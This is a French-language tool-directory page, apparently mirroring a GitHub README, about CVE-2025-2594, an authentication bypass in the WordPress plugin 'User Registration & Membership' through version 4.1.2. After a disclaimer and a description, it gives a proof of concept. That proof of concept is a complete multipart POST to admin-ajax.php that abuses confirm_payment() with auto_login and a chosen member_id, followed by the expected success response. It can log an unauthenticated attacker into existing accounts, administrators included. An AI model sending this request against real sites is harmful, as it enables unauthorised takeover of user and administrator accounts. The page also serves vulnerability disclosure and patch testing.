Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2594 — User Registration & Membership <= 4.1.2 - Contournement d'authentification | Kitploit
Outils/GitHubGitHub/ubaydev/cve-2025-2594
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHububaydev/cve-2025-2594

CVE-2025-2594

User Registration & Membership <= 4.1.2 - Contournement d'authentification

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2594

User Registration & Membership <= 4.1.2 - Contournement de l'authentification

Avertissement !

Les informations présentées dans ce rapport CVE (Common Vulnerabilities and Exposures) sont fournies à des fins éducatives et informatives uniquement. Les détails fournis sont basés sur des ressources publiquement disponibles, des recherches et des analyses menées par l'auteur. Le contenu n'a pas pour but de promouvoir ou d'encourager des activités illégales, y compris le piratage, l'exploitation ou l'accès non autorisé à des systèmes.

L'auteur n'assume aucune responsabilité en cas d'utilisation abusive des informations présentées. Il est recommandé aux individus et aux organisations d'appliquer ces connaissances de manière responsable et conformément aux lois et règlements applicables. Les lecteurs sont fortement invités à tester les vulnérabilités uniquement dans des environnements contrôlés et avec une autorisation appropriée.

L'auteur et les contributeurs de ce rapport n'approuvent ni ne soutiennent les activités malveillantes et encouragent la divulgation responsable et les pratiques de piratage éthique.


Description

Une vulnérabilité de sécurité critique a été découverte dans le plugin WordPress « User Registration & Membership », un outil populaire pour créer des sites d'adhésion et des formulaires d'inscription. La faille, identifiée comme CVE-2025-2594, porte un score CVSS de 8,1, ce qui indique sa gravité élevée.

Le plugin User Registration & Membership pour WordPress est vulnérable à un contournement de l'authentification dans les versions jusqu'à la version 4.1.2 incluse. Cela est dû à une authentification incorrecte dans la fonction 'confirm_payment()'. Cela permet à des attaquants non authentifiés de se connecter à un compte utilisateur existant sur le site, même à un administrateur, à condition que :

  1. Le module complémentaire d'adhésion (membership add-on) soit activé

PoC (Proof Of Concept)

  1. Obtenir le _confirm_payment_nonce sur la page d'inscription
  2. Exemple de données de requête
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: PostmanRuntime/7.43.3
    Accept: */*
    Postman-Token: b41b34c8-c1c9-4e3a-aa4f-380706626e7a
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------705549092016875046023302
    Content-Length: 565
    
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_confirm_payment
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="security"
    
    CONFIRM_PAYMENT_NONCE
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="form_response"
    
    { "auto_login": true }
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="member_id"
    
    1
    ----------------------------705549092016875046023302--
    
  3. La réponse doit ressembler à ceci
    root@kitploit:~
    {"success":true,"data":{"message":null}}
    
  4. Exemple de réponse Capture d'écran 14

Référence

  1. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-412-authentication-bypass
  2. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.1/modules/membership/includes/AJAX.php#L566
  3. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/AJAX.php
  4. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/Admin/Services/MembersService.php

Merci

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
Télécharger l’outil